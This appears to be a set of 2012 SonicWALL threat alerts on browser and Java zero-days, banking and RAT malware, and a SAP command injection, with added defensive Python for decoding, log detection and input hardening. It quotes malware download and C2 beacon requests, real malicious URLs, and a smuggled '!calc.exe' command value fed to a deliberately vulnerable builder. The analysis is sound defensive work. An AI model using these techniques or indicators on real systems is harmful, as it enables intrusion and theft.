New IE 0 day seen in the wild (Sep 17, 2012)

Dell SonicWALL UTM Research team received reports of a new zero-day exploit targeting recent versions of Internet Explorer in the wild. The exploit targets a use-after-free vulnerability in Internet Explorer and is packaged in an encrypted SWF file along with JavaScript helper files. On successful exploitation it downloads and executes a Poison Ivy RAT.

The exploit is attempted using the following components:

  • Exploit.html: This is the initial entry point of the exploit. It creates an img element and loads Moh2010.swf.
  • Moh2010.swf: The SWF is encrypted and obfuscated using DoSWF. On execution it performs a heap spray and creates an iframe that leads to Protect.html.

  • Protect.html: It checks whether it is running on Windows XP with Internet Explorer 7 or 8. Note, however, that the exploit is also successful on Internet Explorer 9 and Windows Vista. We advise Dell SonicWALL customers to refrain from using Internet Explorer until this vulnerability is patched.

  • Poison Ivy RAT: When the exploit succeeds it downloads and executes a Poison Ivy RAT Trojan. The downloaded Trojan is XOR’ed with the single-byte key 0x70 and is decoded before execution. The Trojan performs the following activities when executed:
    • It creates a copy of itself:
      %temp%\1992218.dat [Detected as “GAV: Poison.NHM (Trojan)”]
    • It creates a service to start itself on reboot:
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN
    • It attempts to contact a remote server, which had already been taken down at the time of analysis.
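The single-byte XOR applied to the downloaded payload is easy to undo, and the key does not have to be known in advance. The Python below is an added example, not SonicWALL's code: it tries all 256 single-byte keys and accepts the one that yields a valid PE image (MZ at offset 0 and the PE signature at e_lfanew), so it generalises the 0x70 case above to any single-byte key. The encoded input is a constructed minimal PE header, not the Poison Ivy binary.

```python
"""Recover a single-byte XOR key from an encoded PE download.

Added example, not SonicWALL's code. The alert above reports the Poison Ivy
payload arriving XOR'ed with 0x70; instead of assuming the key, brute-force
all 256 candidates and keep the one that produces a PE image.
The sample below is a constructed minimal PE header, not the real payload.
"""
import struct


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the dropper's 'decryption')."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes):
    """Return (key, decoded) for the first key that yields a PE, else None.

    XOR with a fixed key is a bijection per key, so at most one key maps the
    first two encoded bytes onto 'MZ'; the e_lfanew/PE check rules out
    coincidences on blobs that merely start with the right two bytes."""
    for key in range(256):
        decoded = xor_bytes(blob, key)
        if looks_like_pe(decoded):
            return key, decoded
    return None


# Constructed sample: a minimal MZ stub with e_lfanew = 0x40 and a PE signature.
_stub = bytearray(b"MZ" + b"\x00" * 0x3A)
_stub += struct.pack("<I", 0x40)            # e_lfanew at offset 0x3C
_stub += b"PE\0\0" + b"\x00" * 0x10         # PE signature plus padding
FAKE_PE = bytes(_stub)

ENCODED_SAMPLE = xor_bytes(FAKE_PE, 0x70)   # what the dropper would download

if __name__ == "__main__":
    found = recover_xor_key(ENCODED_SAMPLE)
    if found:
        key, pe = found
        print(f"key=0x{key:02x}, decoded {len(pe)} bytes with intact PE header")
```

The same idea works as a manual check before decoding: a single-byte XOR turns the zero padding in a PE header into long runs of the key byte, so a download that is mostly 0x70 bytes is already suspicious.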

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: SWFExp.G (Trojan)
  • GAV: SWFLoad.G (Trojan)
  • GAV: Malformed.html.MT.2 (Exploit)
  • GAV: Shellcode.GEN_12
  • IPS: 8669 Microsoft IE selectAll execCommand Invocation
  • IPS: 7370 HTTP Client Shellcode Exploit 68a
  • IPS: 4665 HTTP Client Shellcode Exploit 13a

Microsoft Security Bulletin Coverage (Sep 11, 2012)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2012. A list of issues reported, along with Dell SonicWALL coverage information follows:

MS12-061 Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584)

  • CVE-2012-1892 XSS Vulnerability
    IPS:8607 – Microsoft Visual Studio Team Foundation Server XSS

MS12-062 Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528)

  • CVE-2012-2536 Reflected XSS Vulnerability
    IPS:1369 – Cross-Site Scripting (XSS) Attempt 1
    IPS:1380 – Cross-Site Scripting (XSS) Attempt 2

Win 8 Security System FakeAV with Rootkit discovered in the wild (Sep 7, 2012)

Dell SonicWALL UTM Research team has discovered a new FakeAV malware in the wild called Win 8 Security System. FakeAV malware of this nature has been covered in a previous SonicALERT. This variant is different in that it deploys a rootkit driver as part of its infection process, which makes the malware very difficult to remove.

Although the sample we obtained failed to show any pop-up dialogs we were able to gain information about its intentions through our analysis.

The Trojan uses the following icon:

Upon infection, the Trojan deletes its original executable. It makes the following changes to the filesystem:

It copies itself to:

  • %APPDATA%\72706355694bcd40.exe [Detected as GAV: FakeAV.WN8 (Trojan)]

It drops a rootkit to:

  • %WINDOWS%\system32\drivers\2a236245d0309b5.sys [Detected as GAV: Rootkit.X (Trojan)]

The rootkit’s file attributes are set to protect it from modification or deletion, even in safe mode.

It adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “%APPDATA%\72706355694bcd40.exe”

A sample of keys added to register the rootkit driver:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000 Service “2a236245d0309b5”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000 Legacy dword:00000001
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000 ConfigFlags dword:00000000
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000 Class “LegacyDriver”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000 DeviceDesc “2a236245d0309b5”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_2A236245D0309B5\0000\Control ActiveService “2a236245d0309b5”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_9DC9B000 DeviceDesc “72706355694bcd40.exe”

Several HTML pages were extracted from the 72706355694bcd40.exe executable during analysis. They are used to hook into various browsers, such as Internet Explorer and Google Chrome, and produce a fake security alert.

We also extracted the following landing pages from the executable:

  • http://st777st.com/z.php?ver=2
  • http://win8sec.com/?do=payment&ver=2
  • http://win8sec.com/?do=minicontact&ver=2

[Screenshot: the payment landing page]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeAV.WN8 (Trojan)
  • GAV: Rootkit.X (Trojan)

GE Proficy KeyHelp ActiveX Control Vulnerability (Sep 6, 2012)

GE Intelligent Platforms’ industrial software provides functionality including a SCADA engine, a distributed networking model, real-time information collection and analysis, a graphical application development environment, batch automation and so forth.

Installing any of the following products also deploys an ActiveX control named KeyHelp.ocx, which adds HTML Help functionality from a third party:

  • GE Proficy Historian
  • GE Proficy HMI/SCADA iFIX
  • GE Proficy Pulse
  • GE Proficy Batch Execution
  • GE Proficy I/O Drivers

A remote code execution vulnerability exists in GE Proficy products. The vulnerability is due to exposure of an unsafe method in the KeyHelp.ocx ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted webpage using Internet Explorer. Successful exploitation could lead to arbitrary code execution in the security context of the logged-in user. Failed attacks could lead to termination of the browser.

The vulnerability has been assigned CVE-2012-2516.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 8582 GE Proficy KeyHelp ActiveX Instantiation

EMC AutoStart Buffer Overflow (Aug 29, 2012)

EMC AutoStart provides high availability across multiple operating systems, including UNIX, Linux and Microsoft Windows, for Oracle, Microsoft Exchange and SQL Server clustered environments. AutoStart monitors applications, networks, servers and storage, and automates application restart on an alternate server, local or remote, in the event of a planned or unplanned service outage. On request, AutoStart automates failback of services, applications and data to ensure business continuity.

The EMC AutoStart architecture is built around the concept of nodes, which are grouped in domains. One or more nodes can be grouped to form the AutoStart domain. All operations performed by AutoStart take place within the domain. The node is the basic building block within AutoStart. A node is any machine with an AutoStart agent installed and running. The agent provides the monitoring and management capabilities within the node.

The agent service listens on TCP port 8045 for communication with agents on other nodes. The communication protocol used by the AutoStart agent service is proprietary and not publicly documented. By observing the traffic transferred between AutoStart agents, the following patterns have been identified.

 Offset  Size  Description
 ------  ----  ------------------------
 0x00    4     unknown
 0x04    2     major version number
 0x06    2     minor version number
 0x08    4     unknown DWORD
 0x0c    4     code1
 0x10    4     code2
 0x14    4     length (x), size of data
 0x18    x     data section

Multiple buffer overflow vulnerabilities have been found in the EMC AutoStart product. A remote attacker who can send or manipulate traffic between the agents, for example by crafting the header fields listed above, can potentially cause a denial of service or execute arbitrary code within the context of the affected application.
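The layout recovered above is enough to write a checker that refuses any message whose length field does not agree with the bytes actually on the wire, which is what an IPS signature for this class of bug boils down to. The Python below is an added example, not EMC's or SonicWALL's code. The page does not state the byte order, so little-endian is an assumption exposed as a parameter; the 64 KiB ceiling and the sample messages are constructed for the example.

```python
"""Parser and length check for the EMC AutoStart agent message header.

Added example, not EMC's or SonicWALL's code. Field layout follows the
table above (0x00-0x17 header, data from 0x18). Byte order is assumed
little-endian; MAX_DATA is an assumed detection threshold, not a protocol
limit. Messages below are constructed, not captured traffic.
"""
import struct

HEADER_FMT = "IHHIIII"      # unknown, major, minor, unknown DWORD, code1, code2, length
HEADER_LEN = struct.calcsize("<" + HEADER_FMT)   # 0x18
MAX_DATA = 64 * 1024        # assumed sane ceiling for the data section


class AutoStartError(ValueError):
    """Raised when a message header is inconsistent with its payload."""


def parse_autostart(msg: bytes, byteorder: str = "<") -> dict:
    """Split one agent message into header fields and data.

    A header that declares more data than was received is exactly the
    condition a fixed-size copy would overflow on, so it is rejected
    rather than trusted."""
    if len(msg) < HEADER_LEN:
        raise AutoStartError(f"truncated header: {len(msg)} < {HEADER_LEN}")
    _unk0, major, minor, _unk8, code1, code2, length = struct.unpack_from(
        byteorder + HEADER_FMT, msg)
    actual = len(msg) - HEADER_LEN
    if length > MAX_DATA:
        raise AutoStartError(f"declared length {length:#x} exceeds {MAX_DATA:#x}")
    if length != actual:
        raise AutoStartError(f"declared length {length} != payload length {actual}")
    return {"version": (major, minor), "code1": code1, "code2": code2,
            "length": length, "data": msg[HEADER_LEN:]}


def build_autostart(major: int, minor: int, code1: int, code2: int, data: bytes,
                    declared_length=None, byteorder: str = "<") -> bytes:
    """Assemble a message; declared_length lets a test forge a lying header."""
    if declared_length is None:
        declared_length = len(data)
    return struct.pack(byteorder + HEADER_FMT, 0, major, minor, 0,
                       code1, code2, declared_length) + data


def is_well_formed(msg: bytes) -> bool:
    """Convenience wrapper: True only if parse_autostart accepts the message."""
    try:
        parse_autostart(msg)
        return True
    except AutoStartError:
        return False


# Constructed messages: one honest, one whose length field lies.
GOOD = build_autostart(5, 3, 0x10, 0x20, b"status-request")
LYING = build_autostart(5, 3, 0x10, 0x20, b"short", declared_length=0x7FFFFFFF)

if __name__ == "__main__":
    print(parse_autostart(GOOD))
    print("lying header accepted:", is_well_formed(LYING))
```

With a real capture the first thing to confirm is the byte order: parse a few known-good messages with both `"<"` and `">"` and keep whichever makes the length field equal the remaining bytes.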

Dell SonicWALL UTM team has researched these vulnerabilities and released the following IPS signatures to protect its customers.

  • 7703 EMC AutoStart Buffer Overflow 1
  • 8553 EMC AutoStart Buffer Overflow 2
  • 5512 Server Application Shellcode Exploit 28

The vulnerabilities have been assigned CVE-2012-0409.

New Java Zero Day exploit attacks in the wild (Aug 27, 2012)

Update – 08/28/2012

Dell SonicWALL UTM Research team discovered spam campaigns involving Blackhole exploit kit URLs already utilizing the new Java Zero Day exploit that we analyzed yesterday.

[Screenshot: a sample e-mail message from the Intuit spam campaign]

[Screenshot: structure of the exploit file that executes on the victim machine if the user clicks the URL]

The malicious executable contacts.exe, downloaded onto the target machine as a result of a successful exploit run, is in this case a Cridex banking Trojan variant.


Original Alert: Published – 08/27/2012

Dell SonicWALL UTM Research team found reports of a new zero-day vulnerability in the wild targeting Java that allows an attacker to download and execute a malicious executable on the victim machine.

We were able to confirm this exploit in our research lab against the latest Java 7 release at the time:

java version “1.7.0_06”
Java(TM) SE Runtime Environment (build 1.7.0_06-b24)

It is interesting to note that this exploit does not work on Java version 6. At the time of writing this alert, Oracle’s security advisory page carries no information about this issue.

Infection Cycle

  • An unsuspecting user visits a malicious or compromised site that leads to the download of the Java exploit JAR file.
  • The Java exploit escapes the Java sandbox, then downloads and executes a malicious binary, which in this case is a Poison Ivy variant [Detected as GAV: Poison.NHM (Trojan)]:
    • GET /meeting/hi.exe HTTP/1.1
      User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_03
  • The initial landing page contained highly obfuscated JavaScript code, encoded with a module named Dadong’s JSXX 0.44 VIP.
  • The malicious JAR exploit file that gets downloaded contains two classes, Gondvv.class and Gondzz.class. Gondvv.class contains the init function, and the first thing it does is disable protection against local file execution. It then checks whether the operating system is Windows and calls the xrun() function in Gondzz.class, which downloads a remote file into the temp directory and runs it.
  • The server hosting the Java zero-day exploit was still active at the time of writing this alert and serving the Poison Ivy binary upon successful exploit runs.

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Poison.NHM (Trojan)
  • GAV: JavaDZ.A (Exploit)
  • GAV: Malformed.class.MT.1 (Exploit)

Psychlo NewBoss v1.0 bot analysis

Dell SonicWALL Threats Research team came across a new malware submission that looks like a bot with backdoor functionality. The malware executable appeared to arrive from a compromised site via drive-by download exploits.

The original malware executable is downloaded from maisonwake(REMOVED)/fancybox/a.gif, using an image file extension as a disguise. The malware author internally appears to refer to this malware as Psychlo NewBoss v1.0.

Infection Cycle

The bot when executed drops a copy of itself on the victim machine and runs it:

  • (All Users)\MDGAUCC9epNUbnWkqPUVsE9suH5tvi.exe [Detected as GAV: Neojit.A (Trojan)]

It also ensures that the dropped executable runs upon system reboot by adding the following registry value:

  • HKU\Software\Microsoft\Windows\CurrentVersion\Run\EP7gYQcJX: “(All Users)\MDGAUCC9epNUbnWkqPUVsE9suH5tvi.exe”

It generates an internal configuration file that consists of a GIF header with encrypted content appended to it. Samples of the encrypted and decrypted configuration file, together with the internal configuration file format as defined by the malware author, are shown below:

[Screenshots: encrypted and decrypted configuration file, and the configuration file format]

The malware walks the user’s Program Files directory and builds a list of Windows executables whose machine type is IMAGE_FILE_MACHINE_I386 (x86). It then randomly picks one executable from the list, runs it and injects malicious code into the legitimate program’s process.

The legitimate program injected with malicious code creates a Mutex to mark its presence on the system:

  • MutexName = “{4012d34795ec88fec6a6d103659a9783}”

It then attempts to contact its remote C&C domains every five minutes to register the infection and receive further instructions. The registration request has the following form:

  GET /newg/a.php?s=00005c39&m=fdd79d5d654416b63e7b275628ebd57f&u=(Encoded Username)&g=nb.7Y49&o=(Operating System)&ml= HTTP/1.1
  User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
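Both this beacon and the Java zero-day payload fetch described earlier (GET /meeting/hi.exe with a Java/1.7.0_03 user-agent) are visible in web-proxy logs. The Python below is an added example, not SonicWALL's code: it runs three checks over constructed log lines, a Java user-agent downloading an .exe, an internal client presenting a Googlebot user-agent, and the a.php registration beacon with its s/m/u/g/o parameters. The log format and the example.invalid hostnames are assumptions made for the example; the indicators themselves are the ones quoted on this page.

```python
"""Detection pass over web-proxy log lines for the Java 0-day download and
the Psychlo NewBoss beacon described above.

Added example, not SonicWALL's code. Log format (timestamp, client, method,
URL, quoted user-agent) and hostnames are constructed for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines; the URLs and user-agents mirror the alerts above.
PROXY_LOG = """\
2012-08-27T10:01:12 10.0.0.5 GET http://example.invalid/meeting/hi.exe "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_03"
2012-08-27T10:06:40 10.0.0.7 GET http://example.invalid/newg/a.php?s=00005c39&m=fdd79d5d654416b63e7b275628ebd57f&u=QWxpY2U&g=nb.7Y49&o=WinXP&ml= "Googlebot/2.1 (+http://www.google.com/bot.html)"
2012-08-27T10:07:03 10.0.0.9 GET http://example.invalid/index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"
2012-08-27T10:08:15 10.0.0.5 GET http://example.invalid/update.jar "Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_03"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')
PSYCHLO_KEYS = {"s", "m", "u", "g", "o"}     # from the beacon quoted above
MD5_RE = re.compile(r"[0-9a-f]{32}")          # the m= parameter is a 32-hex-digit value


def parse_line(line: str) -> dict:
    """Split one constructed-format log line into its fields."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    ts, client, method, url, ua = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url, "ua": ua}


def classify(entry: dict) -> list:
    """Return the names of the indicators that match one parsed request."""
    hits = []
    url = urlsplit(entry["url"])
    ua = entry["ua"]
    # The JRE itself fetching a Windows executable is how the Java 0-day
    # pulled its Poison Ivy payload (GET /meeting/hi.exe above).
    if "Java/" in ua and url.path.lower().endswith(".exe"):
        hits.append("java-exe-download")
    # A search-engine crawler user-agent never originates from an inside client.
    if ua.startswith("Googlebot/"):
        hits.append("crawler-ua-from-client")
    # Psychlo beacon: a.php carrying s/m/u/g/o with a 32-hex-digit m= value.
    qs = parse_qs(url.query, keep_blank_values=True)
    if (url.path.endswith("/a.php") and PSYCHLO_KEYS.issubset(qs)
            and MD5_RE.fullmatch(qs["m"][0])):
        hits.append("psychlo-beacon")
    return hits


def scan_log(text: str) -> list:
    """Return (client, url, hits) for every line that triggered an indicator."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        hits = classify(entry)
        if hits:
            findings.append((entry["client"], entry["url"], hits))
    return findings


if __name__ == "__main__":
    for client, url, hits in scan_log(PROXY_LOG):
        print(client, ", ".join(hits), url)
```

The crawler check is deliberately broad: the beacon's user-agent is a plain string and will change, but an outbound request from a workstation claiming to be Googlebot is anomalous on its own and survives a change of path or parameter names.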

A partial list of commands that we encountered while analyzing this malware is shown below:

Psychlo NewBoss v1.0 Commands

  • ReadConfigFile
  • WriteConfigFile
  • LoadDefaultConfigFile
  • PrintConfigFile
  • Create
  • Destroy
  • ResetConfigFile
  • ParseCommandLine
  • SetAppType
  • LoadBaseApp
  • GenerateNewEncryptedSoftware
  • InjectIntoProgramFile
  • InstallRegAutoStart
  • Install
  • Update
  • Uninstall

We observed the following logging messages while analyzing this malware:

Psychlo NewBoss v1.0 Logging activity

  • SelfName:
  • Installer:
  • Installing version nb.7Y49
  • Updating from version nb.7Y49
  • Injector Manager Dest:
  • Source file found:
  • File app decrypted:
  • Injectable programs found:
  • Injecting into:
  • Program code:
  • Accessing the server...
  • Server.ConfigFile = nb.7Y49
  • Update app ->
  • Download url =
  • File downloaded
  • MD5 Good
  • Decrypted
  • Temp filename:
  • File saved:
  • Running modules
  • ComputerName:
  • UserName:

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Neojit.A (Trojan)
  • GAV: Neojit.A_2 (Trojan)

SAP NetWeaver Command Injection (August 24, 2012)

SAP NetWeaver is an application framework which forms the base for SAP’s Business Suite. It includes a development and runtime environment for SAP and custom applications. NetWeaver uses the ABAP programming language, designed specifically for business application programming, along with industry standards that allow it to be integrated with technologies such as .NET and Java EE. NetWeaver contains several services and processes to handle incoming network requests. One such service is the remote management Simple Object Access Protocol (SOAP) interface, which allows administrators to manage the system remotely from any computer with a web browser and Java support.

A command execution vulnerability exists in SAP NetWeaver. The vulnerability is due to insufficient validation of SOAP requests. When the vulnerable service receives a SOAP request from the user, it will use command-line tools in the background to process the request. Specifically, values from the mValue tag paired with mKey tags with values of “Database/Type”, “Database/Password”, “Database/Username” and “Database/Name” are used to create arguments for the shell command sapdbctrl.exe. The command line is generated in the following format:

  "C:\Program Files\SAP\hostctrl\exe\sapdbctrl.exe" status "Database/Name" -P -T 1 -t "Database/Type" -p -u "Database/Username"

The vulnerable code encloses the parameters in quotes if they contain spaces and passes them to sapdbctrl.exe without validation. The binary also creates a set of command line parameters which it uses in a call to another shell command. This makes it possible to indirectly pass arguments to the other, more privileged, binary. The program also allows users to execute arbitrary system commands by prefixing the command with an exclamation mark. For example, to execute the calculator application on the target host, the command ‘!calc.exe’ can be injected.

By crafting a malicious request to create a script file containing commands to execute, followed by a malicious request to execute the script file, remote unauthenticated attackers can exploit this vulnerability to execute arbitrary commands on the target system. The executed commands will run with Administrative privileges.
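The root cause is the way the SOAP values are spliced into a command line. The Python below is an added example, not SAP's or SonicWALL's code: it pulls the mKey/mValue pairs out of a constructed request (the wrapping element names aArguments/item are assumed; the page only establishes the mKey/mValue pairing), shows the quote-only-if-spaces construction described above passing a ‘!calc.exe’ database name straight through, and a hardened form that allowlists each value and hands sapdbctrl.exe an argument vector rather than a shell string.

```python
"""SOAP parameter extraction and argument hardening for the sapdbctrl call.

Added example, not SAP's or SonicWALL's code. The element names wrapping
the mKey/mValue pairs (aArguments/item) are assumed; the command-line
format is the one quoted above. The request is constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

SAPDBCTRL = r"C:\Program Files\SAP\hostctrl\exe\sapdbctrl.exe"
DB_KEYS = ("Database/Name", "Database/Type", "Database/Username", "Database/Password")

# Constructed request: Database/Name carries sapdbctrl's '!' command prefix.
SOAP_REQUEST = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <GetDatabaseStatus>
      <aArguments>
        <item><mKey>Database/Name</mKey><mValue>!calc.exe</mValue></item>
        <item><mKey>Database/Type</mKey><mValue>ada</mValue></item>
        <item><mKey>Database/Username</mKey><mValue>control</mValue></item>
        <item><mKey>Database/Password</mKey><mValue>secret</mValue></item>
      </aArguments>
    </GetDatabaseStatus>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


def extract_pairs(soap_xml: str) -> dict:
    """Collect every mKey/mValue sibling pair, whatever element wraps them."""
    pairs = {}
    for el in ET.fromstring(soap_xml).iter():
        key, val = el.find("mKey"), el.find("mValue")
        if key is not None and val is not None:
            pairs[(key.text or "").strip()] = val.text or ""
    return pairs


def build_cmdline_vulnerable(p: dict) -> str:
    """The pattern described above: quote a value only if it contains a
    space, otherwise splice it into the command line unchecked. A leading
    '!' therefore reaches sapdbctrl.exe intact."""
    def q(v: str) -> str:
        return f'"{v}"' if " " in v else v
    return (f'"{SAPDBCTRL}" status {q(p["Database/Name"])} -P -T 1 '
            f'-t {q(p["Database/Type"])} -p -u {q(p["Database/Username"])}')


# Allowlist: alphanumerics, '_', '.', '-'; no leading '-' so a value can
# never be parsed as an option, and no '!', quotes or whitespace at all.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


def build_argv_safe(p: dict) -> list:
    """Hardened form: validate each value against the allowlist, then pass
    argv as a list (subprocess-style), never as a shell string."""
    for k in ("Database/Name", "Database/Type", "Database/Username"):
        v = p.get(k, "")
        if not SAFE_VALUE.match(v):
            raise ValueError(f"rejected {k}={v!r}")
    return [SAPDBCTRL, "status", p["Database/Name"], "-P", "-T", "1",
            "-t", p["Database/Type"], "-p", "-u", p["Database/Username"]]


def is_safe_request(p: dict) -> bool:
    """True only if the hardened builder accepts every value."""
    try:
        build_argv_safe(p)
        return True
    except (KeyError, ValueError):
        return False


if __name__ == "__main__":
    pairs = extract_pairs(SOAP_REQUEST)
    print("vulnerable:", build_cmdline_vulnerable(pairs))
    print("hardened accepts request:", is_safe_request(pairs))
```

Quoting is the wrong tool here because the injection never relies on breaking out of the quotes: sapdbctrl.exe interprets the value itself. Only an allowlist on the value, applied before it reaches the child process, closes the path.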

Dell SonicWALL has released an IPS signature that addresses attack permutations targeting this vulnerability. The following signature was released:

  • 8536 – SAP NetWeaver Remote Command Execution

New Cridex variant from drive-by blackhole exploit (Aug 17, 2012)

Dell SonicWALL Threats Research team has discovered a new variant of the Cridex banking Trojan. The Trojan uses the Blackhole exploit kit for drive-by system infection. Its purpose is to steal online banking credentials, and it has the ability to intercept encrypted communications between banking websites and their customers.

The infection occurs when visiting a web page carrying a malicious Blackhole script [Detected as GAV: BlacoleRef.W_8 (Exploit)].

The Trojan creates the following file on the filesystem:

  • %APPDATA%\KB01217753.exe [Detected as GAV: Cridex.E_4 (Trojan)]

The Trojan creates the following key in the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KB01217753.exe “%APPDATA%\KB01217753.exe”

Upon infection the Trojan injects code into explorer.exe, which then sends sensitive system data, encrypted, to a remote C&C server.

As in a previous variant, it hooks various Winsock communication APIs to intercept incoming and outgoing browser traffic.

It also hooks cryptographic APIs such as CryptDecrypt, CryptEncrypt, EncryptMessage and DecryptMessage. This allows it to intercept SSL communication between banking websites and their customers and to inject HTML code into web pages to steal credentials. During analysis we also received and decrypted a configuration file from a remote C&C server.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: BlacoleRef.W_8 (Exploit)
  • GAV: Cridex.E_4 (Trojan)

Microsoft Security Bulletin Coverage (Aug 14, 2012)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of August, 2012. A list of issues reported, along with Dell SonicWALL coverage information follows:

MS12-052 Cumulative Security Update for Internet Explorer (2722913)

  • CVE-2012-1526 Layout Memory Corruption Vulnerability
    IPS:8439 – Windows IE Layout Memory Corruption 4
  • CVE-2012-2521 Asynchronous NULL Object Access Remote Code Execution Vulnerability
    IPS:8442 – Suspicious HTML Style Tag 4
  • CVE-2012-2522 Virtual Function Table Corruption Remote Code Execution Vulnerability
    GAV: Malformed.html.MP.6
  • CVE-2012-2523 JavaScript Integer Overflow Remote Code Execution Vulnerability
    IPS:7645 – HTTP Client Shellcode Exploit 11a

MS12-053 Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135)

  • CVE-2012-2526 Remote Desktop Protocol Vulnerability
    IPS:4198 – Suspicious RDP Traffic 8

MS12-054 Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594)

  • CVE-2012-1850 Remote Administration Protocol Denial of Service Vulnerability
    IPS:8447 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054) 3
  • CVE-2012-1851 Print Spooler Service Format String Vulnerability
    IPS:8446 – Windows Print Spooler Format String Exploit
  • CVE-2012-1852 Remote Administration Protocol Heap Overflow Vulnerability
    IPS:8444 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054) 2
  • CVE-2012-1853 Remote Administration Protocol Stack Overflow Vulnerability
    IPS:8443 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054)

MS12-055 Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847)

  • CVE-2012-2527 Win32k Use After Free Vulnerability
    Local EoP vulnerability, not covered

MS12-056 Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution (2706045)

  • CVE-2012-2523 JavaScript Integer Overflow Remote Code Execution Vulnerability
    Please refer to MS12-052 above

MS12-057 Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879)

  • CVE-2012-2524 CGM File Format Memory Corruption Vulnerability
    There is no public exploit available

MS12-058 Vulnerability in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358)

  • CVE-2012-2525 Oracle Outside In Libraries Remote Code Execution Vulnerability
    No details about this vulnerability are available

MS12-059 Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918)

  • CVE-2012-1888 Visio DXF File Format Buffer Overflow Vulnerability
    GAV: Malformed.dxf.MP.1

MS12-060 Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573)

  • CVE-2012-1856 MSCOMCTL.OCX RCE Vulnerability
    GAV: Malformed.rtf.MP.2